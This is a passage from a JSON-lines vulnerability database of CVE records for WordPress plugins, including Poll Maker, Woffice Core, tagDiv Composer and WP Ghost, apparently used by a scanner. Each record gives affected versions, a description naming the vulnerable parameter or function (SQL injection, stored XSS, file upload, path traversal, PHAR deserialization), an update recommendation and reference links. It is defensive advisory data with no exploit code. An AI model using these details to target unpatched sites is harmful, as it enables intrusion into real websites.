version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a7e8284-d70f-4448-8f0d-99c23b8eda79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a7e8284-d70f-4448-8f0d-99c23b8eda79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179500\\\/WordPress-Poll-Maker-5.3.2-SQL-Injection.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179500\\\/WordPress-Poll-Maker-5.3.2-SQL-Injection.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-results-list-table.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-results-list-table.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.7\\\/includes\\\/lists\\\/class-poll-maker-each-results-poll-list-table.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.7\\\/includes\\\/lists\\\/class-poll-maker-each-results-poll-list-table.php#L48\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9475","slug":"poll-maker","versionImpact":"5.4.6","versionEndExcluding":"5.4.7","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to generic SQL Injection via the order_by parameter in all versions up to, and including, 5.4.6  due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8798e16d-84dd-40bb-b4ff-db800e850b0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8798e16d-84dd-40bb-b4ff-db800e850b0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.5\\\/includes\\\/lists\\\/class-poll-maker-each-results-poll-list-table.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.5\\\/includes\\\/lists\\\/class-poll-maker-each-results-poll-list-table.php#L56\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9462","slug":"poll-maker","versionImpact":"5.4.6","versionEndExcluding":"5.4.7","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Stored Cross-Site Scripting via poll settings in all versions up to, and including, 5.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e6434fb-390d-439d-bf3e-9afe8644fd58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e6434fb-390d-439d-bf3e-9afe8644fd58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L244\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L362\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L362\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4642","slug":"kk-star-ratings","versionImpact":"5.4.5","versionEndExcluding":"5.4.6","description":"The kk Star Ratings WordPress plugin before 5.4.6 does not implement atomic operations, allowing one user vote multiple times on a poll due to a Race Condition.","recommendation":"Update to version 5.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f481d34-6feb-4af2-914c-1f3288f69207\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f481d34-6feb-4af2-914c-1f3288f69207\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-32121","slug":"zero-spam","versionEndExcluding":"5.4.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Highfivery LLC Zero Spam for WordPress allows SQL Injection.This issue affects Zero Spam for WordPress: from n\/a through 5.4.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zero-spam\\\/wordpress-zero-spam-for-wordpress-plugin-5-4-4-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zero-spam\\\/wordpress-zero-spam-for-wordpress-plugin-5-4-4-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9349","slug":"amazon-auto-links","versionImpact":"5.4.2","versionEndExcluding":"5.4.3","description":"The Auto Amazon Links \u2013 Amazon Associates Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.4.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ebd4936-9d68-42cb-a427-a1db894b49ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ebd4936-9d68-42cb-a427-a1db894b49ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazon-auto-links\\\/tags\\\/5.4.2\\\/include\\\/core\\\/main\\\/admin\\\/report\\\/http_request\\\/AmazonAutoLinks_AdminPage_Tab_HTTPRequest.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazon-auto-links\\\/tags\\\/5.4.2\\\/include\\\/core\\\/main\\\/admin\\\/report\\\/http_request\\\/AmazonAutoLinks_AdminPage_Tab_HTTPRequest.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161302%40amazon-auto-links&new=3161302%40amazon-auto-links&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161302%40amazon-auto-links&new=3161302%40amazon-auto-links&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1124","slug":"wp-easycart","versionEndExcluding":"5.4.3","description":"The Shopping Cart & eCommerce Store WordPress plugin before 5.4.3 does not validate HTTP requests, allowing authenticated users with admin privileges to perform LFI attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229b93cd-544b-4877-8d9f-e6debda9511c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229b93cd-544b-4877-8d9f-e6debda9511c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7694","slug":"woffice-core","versionImpact":"5.4.26","versionEndExcluding":"5.4.27","description":"The Woffice Core plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the woffice_file_manager_delete() function in all versions up to, and including, 5.4.26. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 5.4.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog\",\"name\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/woffice-intranetextranet-wordpress-theme\\\/11671924\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/woffice-intranetextranet-wordpress-theme\\\/11671924\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41a362cf-e27e-436a-85f1-7c48e2e098eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41a362cf-e27e-436a-85f1-7c48e2e098eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2797","slug":"woffice-core","versionImpact":"5.4.21","versionEndExcluding":"5.4.22","description":"The Woffice Core plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.4.21. This is due to missing or incorrect nonce validation on the 'woffice_handle_user_approval_actions' function. This makes it possible for unauthenticated attackers to approve registration for any user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.4.22, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost\\\/wp-content\\\/plugins\\\/woffice-core\\\/extensions\\\/woffice-user-registration\\\/includes\\\/helpers.php#L52\",\"name\":\"http:\\\/\\\/localhost\\\/wp-content\\\/plugins\\\/woffice-core\\\/extensions\\\/woffice-user-registration\\\/includes\\\/helpers.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog#april-1st-2025-version-5422\",\"name\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog#april-1st-2025-version-5422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1665f2d0-899b-4f9b-91b1-e5799c3b4d3d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1665f2d0-899b-4f9b-91b1-e5799c3b4d3d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2780","slug":"woffice-core","versionImpact":"5.4.21","versionEndExcluding":"5.4.22","description":"The Woffice Core plugin for WordPress, used by the Woffice Theme, is vulnerable to arbitrary file uploads due to missing file type validation in the 'saveFeaturedImage' function in all versions up to, and including, 5.4.21. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.4.22, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/woffice-core\\\/extensions\\\/woffice-event\\\/class-fw-extension-woffice-event.php#L1235\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/woffice-core\\\/extensions\\\/woffice-event\\\/class-fw-extension-woffice-event.php#L1235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog#april-1st-2025-version-5422\",\"name\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog#april-1st-2025-version-5422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d057ac6-a341-4ec3-956c-2a2a5636155c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d057ac6-a341-4ec3-956c-2a2a5636155c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1565","slug":"mayosis-core","versionImpact":"5.4.1","versionEndExcluding":"5.4.2","description":"The Mayosis Core plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.4.1 via the library\/wave-audio\/peaks\/remote_dl.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 5.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/mayosis-digital-marketplace-theme\\\/20210200\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/mayosis-digital-marketplace-theme\\\/20210200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b967eb98-69f8-41c5-a19a-9d20979accb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b967eb98-69f8-41c5-a19a-9d20979accb0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11977","slug":"kk-star-ratings","versionImpact":"5.4.10","versionEndExcluding":"5.4.10.2","description":"The The kk Star Ratings \u2013 Rate Post & Collect User Feedbacks plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.4.10. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.4.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kk-star-ratings\\\/tags\\\/5.4.9\\\/src\\\/core\\\/wp\\\/actions\\\/wp_ajax_kk-star-ratings.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kk-star-ratings\\\/tags\\\/5.4.9\\\/src\\\/core\\\/wp\\\/actions\\\/wp_ajax_kk-star-ratings.php#L84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dea49fb-2703-4754-9abd-5f4e526d5570?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dea49fb-2703-4754-9abd-5f4e526d5570?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12210","slug":"woocommerce-delivery-notes","versionImpact":"5.4.0","versionEndExcluding":"5.4.1","description":"The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wcdn_remove_shoplogo' AJAX action in all versions up to, and including, 5.4.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the shop's logo.","recommendation":"Update to version 5.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209682%40woocommerce-delivery-notes&new=3209682%40woocommerce-delivery-notes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209682%40woocommerce-delivery-notes&new=3209682%40woocommerce-delivery-notes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8883d4fe-3ca6-4591-9972-219b114126d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8883d4fe-3ca6-4591-9972-219b114126d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4682","slug":"essential-blocks","versionImpact":"5.4.0","versionEndExcluding":"5.4.1","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML attributes in Slider and Post Carousel widgets in all versions up to, and including, 5.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/5.4.0\\\/src\\\/blocks\\\/post-carousel\\\/src\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/5.4.0\\\/src\\\/blocks\\\/post-carousel\\\/src\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/5.4.0\\\/src\\\/blocks\\\/slider\\\/src\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/5.4.0\\\/src\\\/blocks\\\/slider\\\/src\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3296386\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3296386\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f88f065d-14ca-4547-9a41-f9177979a9ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f88f065d-14ca-4547-9a41-f9177979a9ed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3510","slug":"td-composer","versionImpact":"5.4","versionEndExcluding":"5.4.1","description":"The tagDiv Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in all versions up to, and including, 5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bd6b66d-f33e-4287-850b-a199de72f6ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bd6b66d-f33e-4287-850b-a199de72f6ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2056","slug":"hide-my-wp","versionImpact":"5.4.01","versionEndExcluding":"5.4.02","description":"The WP Ghost (Hide My WP Ghost) \u2013 Security & Firewall plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 5.4.01 via the showFile function. This makes it possible for unauthenticated attackers to read the contents of specific file types on the server, which can contain sensitive information.","recommendation":"Update to version 5.4.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.4.02\\\/models\\\/Files.php#L336\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.4.02\\\/models\\\/Files.php#L336\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f43db496-80ea-442c-9417-7aa03ec95f02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f43db496-80ea-442c-9417-7aa03ec95f02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13794","slug":"hide-my-wp","versionImpact":"5.3.02","versionEndExcluding":"5.4.01","description":"The WP Ghost (Hide My WP Ghost) \u2013 Security & Firewall plugin for WordPress is vulnerable to Login Page Dislcosure in all versions up to, and including, 5.3.02. This is due to the plugin not properly restricting the \/wp-register.php path. This makes it possible for unauthenticated attackers to discover the hidden login page location.","recommendation":"Update to version 5.4.01, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235271%40hide-my-wp&new=3235271%40hide-my-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235271%40hide-my-wp&new=3235271%40hide-my-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9effa526-7454-4490-9bf4-0605254d6625?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9effa526-7454-4490-9bf4-0605254d6625?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3342","slug":"zero-bs-crm","versionImpact":"5.3.1","versionEndExcluding":"5.4.0","description":"The Jetpack CRM plugin for WordPress is vulnerable to PHAR deserialization via the \u2018zbscrmcsvimpf\u2019 parameter in the 'zeroBSCRM_CSVImporterLitehtml_app' function in versions up to, and including, 5.3.1. While the function performs a nonce check, steps 2 and 3 of the check do not take any action upon a failed check. These steps then perform a 'file_exists' check on the value of 'zbscrmcsvimpf'. If a phar:\/\/ archive is supplied, its contents will be deserialized and an object injected in the execution stream. This allows an unauthenticated attacker to obtain object injection if they are able to upload a phar archive (for instance if the site supports image uploads) and then trick an administrator into performing an action, such as clicking a link.","recommendation":"Update to version 5.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2805282\\\/zero-bs-crm\\\/trunk\\\/includes\\\/ZeroBSCRM.CSVImporter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2805282\\\/zero-bs-crm\\\/trunk\\\/includes\\\/ZeroBSCRM.CSVImporter.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zero-bs-crm\\\/trunk\\\/includes\\\/ZeroBSCRM.CSVImporter.php?rev=2790863\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zero-bs-crm\\\/trunk\\\/includes\\\/ZeroBSCRM.CSVImporter.php?rev=2790863\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98ab264f-b210-41d0-bb6f-b4f31d933f80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98ab264f-b210-41d0-bb6f-b4f31d933f80?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13645","slug":"td-composer","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The tagDiv Composer plugin for WordPress is vulnerable to PHP Object Instantiation in all versions up to, and including, 5.3 via module parameter. This makes it possible for unauthenticated attackers to Instantiate a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4124003c-4864-48f1-acba-9a613d9c99ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4124003c-4864-48f1-acba-9a613d9c99ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13527","slug":"philantro","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The Philantro \u2013 Donations and Donor Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'donate' in all versions up to, and including, 5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224699\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224699\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3c8800-cbef-4d85-a1f3-b5c70ba955b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be3c8800-cbef-4d85-a1f3-b5c70ba955b5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2806","slug":"td-composer","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The tagDiv Composer plugin for WordPress, used by the Newspaper theme, is vulnerable to Reflected Cross-Site Scripting via the \u2018data\u2019 parameter in all versions up to, and including, 5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.4, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/td-composer\\\/legacy\\\/common\\\/wp_booster\\\/td_ajax.php#L2034\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/td-composer\\\/legacy\\\/common\\\/wp_booster\\\/td_ajax.php#L2034\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/td_deploy\\\/Newspaper\\\/changed_files_12.6.9_12.7.html\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/td_deploy\\\/Newspaper\\\/changed_files_12.6.9_12.7.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52bd9946-dccc-427a-9abd-0b7153e7484f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52bd9946-dccc-427a-9abd-0b7153e7484f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4534","slug":"wp-limit-failed-login-attempts","versionImpact":"5.3","versionEndExcluding":"5.4","description":"The Limit Login Attempts (Spam Protection) plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 5.3. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.","recommendation":"Update to version 5.4, or a newer patched 